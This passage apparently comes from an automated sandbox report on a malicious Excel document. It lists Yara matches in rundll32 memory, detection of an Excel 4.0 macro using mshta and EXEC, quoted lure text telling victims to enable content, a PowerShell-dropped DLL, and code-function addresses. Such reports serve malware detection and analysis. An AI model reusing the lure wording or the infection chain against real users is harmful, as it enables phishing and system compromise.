                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: CJ68000754184.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: CJ68000754184.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Document contains OLE streams with names of living off the land binaries
                            Source: CJ68000754184.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Source: CJ68000754184.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: CJ68000754184.xlsInitial sample: EXEC
                            Source: CJ68000754184.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068F8FD9_2_0068F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068E9919_2_0068E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068AB879_2_0068AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069907F9_2_0069907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006820519_2_00682051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A00569_2_006A0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006900019_2_00690001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006890119_2_00689011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006920BA9_2_006920BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006870B39_2_006870B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068F09B9_2_0068F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006941169_2_00694116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006851BB9_2_006851BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006881B79_2_006881B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006822519_2_00682251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069A2E89_2_0069A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068E2CC9_2_0068E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068B2C79_2_0068B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006853619_2_00685361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006843469_2_00684346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A13AD9_2_006A13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069C3A09_2_0069C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069D3899_2_0069D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069E3959_2_0069E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069044F9_2_0069044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069F4359_2_0069F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006864E29_2_006864E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006855489_2_00685548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068A55F9_2_0068A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006925509_2_00692550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006985199_2_00698519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006995FA9_2_006995FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068E5CF9_2_0068E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069A6669_2_0069A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069C6319_2_0069C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006986069_2_00698606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006966CA9_2_006966CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068D6D89_2_0068D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069176B9_2_0069176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068B74D9_2_0068B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069473C9_2_0069473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006877359_2_00687735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006897149_2_00689714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006848169_2_00684816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006918899_2_00691889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006889699_2_00688969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069894B9_2_0069894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006859F29_2_006859F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A09B59_2_006A09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00681A569_2_00681A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069AA309_2_0069AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068EA999_2_0068EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068BB7E9_2_0068BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069CB5B9_2_0069CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069BB239_2_0069BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00688B3D9_2_00688B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00690B199_2_00690B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069DBEA9_2_0069DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00698BE39_2_00698BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00699BCF9_2_00699BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00682BD99_2_00682BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00697BA69_2_00697BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00689B839_2_00689B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00694B879_2_00694B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00696C499_2_00696C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00684C5D9_2_00684C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069AC3A9_2_0069AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00683C3C9_2_00683C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00687C379_2_00687C37
